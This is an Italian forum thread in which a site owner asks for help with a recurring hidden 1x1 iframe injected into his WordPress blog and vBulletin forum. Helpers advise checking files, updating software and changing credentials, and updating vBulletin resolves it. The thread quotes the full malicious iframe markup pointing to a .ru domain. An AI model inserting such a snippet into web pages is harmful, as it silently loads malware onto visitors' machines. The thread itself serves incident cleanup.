- Home
- Categorie
- Gaming, Hardware e Software
- Sicurezza Informatica & Privacy
- [Risolto] Malware sul sito
-
[Risolto] Malware sul sito
Ciao a tutti, sono giorni che sul mio sito SIA sul blog che sul forum compare un iframe che google vede come Malware , in effetti lo è
si tratta di questo codice
[PHP]<iframe src="http(duepuntislashslash)directs134.ru/in.cgi?wal" height="1" wid
th="1" hspace="0" vspace="0" marginwidth="0" marginheight="0
">[/PHP]Lo cancello e poi ritorna, idem sul forum... Non so cosa devo fare! Google mi sta uccidendo e sto perdendo visite, piano piano per colpa di questo maledetto virus sto perdendo tutte le visite.
Grazie all'Hacker che l'ha messo..
-
Ciao Gabriel,
sposto il tuo topic nella sezione Sicurezza Informatica che è la tematica più vicina alla tua problematica
-
Ciao Gabriel,
forse perchè elimini "solo in parte" il codice infetto!
Comunque, verifica le cartelle di WP e le ultime modifiche apportate "la data", troverai numerosi file con questa stringa di codice infetto:
<iframe src="http://directs134.ru/in.cgi?wal" height="1" width="1" hspace="0" vspace="0" marginwidth="0" marginheight="0">
Fatto questo, verifica gli aggiornamenti "se disponibili, di plugin e temi", e modifica anche i dati di accesso "ftp ed admin".
p.s. per trovare il codice infetto, prova questo tool online: http://sucuri.net/
-
Il problema sta che non ci sono file editati nel ftp con date recenti! E sul blog ho risolto togliendo una stringa a mano mentre sul forum ( vBulletin ) non so cosa fare! Google mi sta penalizzando e sto perdendo il lavoro di anni..
Sono disperato..
-
@Gabriel_Ambrogio said:
....... sul blog ho risolto togliendo una stringa a mano
... sicuro???
-
Nelle pagine quel codice non è più presente! Puoi controllare tu stesso! Non so cosa posso fare! sono senza idee senza metodi..
Solo sul forum nel codice sorgente compare quel cavolo di codice!
-
Ciao Gabriel,
@Gabriel_Ambrogio said:
Nelle pagine quel codice non è più presente!
confermo, anche il forum!
-
[******]
Problem Solved, è bastato aggiornare i file di vBulletin e il virus in iFrame è sparito, mi domando : Perchè? Che stregoneria è mai questa?
-
Ciao Gabriel,
@Gabriel_Ambrogio said:
Problem Solved, è bastato aggiornare i file di vBulletin
modifica per "sicurezza" anche i dati di accesso "ftp ed admin".
-
Fare ipotesi senza avere niente da controllare è un po' difficile.. Ma se la situazione è quella che credo, si può assumere che, tra gli script php, ce n'era uno infetto che, ogni volta che veniva eseguito (ossia ogni volta che lo script php viene richiesto), andava a inserire il frame in tutte le pagine "possibili".. Quindi, anche se te cancellavi il frame, lo script, una volta caricato, te lo faceva ricomparire.
Se, come hai detto te, aggiornando i file il problema si è risolto, ciò può significare che lo script "infetto" è uno dei file aggiornati, che venendo quindi sostituito non presenta più il codice maligno che aggiunge il frame alle varie pagine ogni volta che viene caricato.Questa, ovviamente, è solo un'ipotesi fatta col (quasi nullo) materiale a disposizione.. Non prenderla per oro colato, ma mi sembra una cosa plausibile
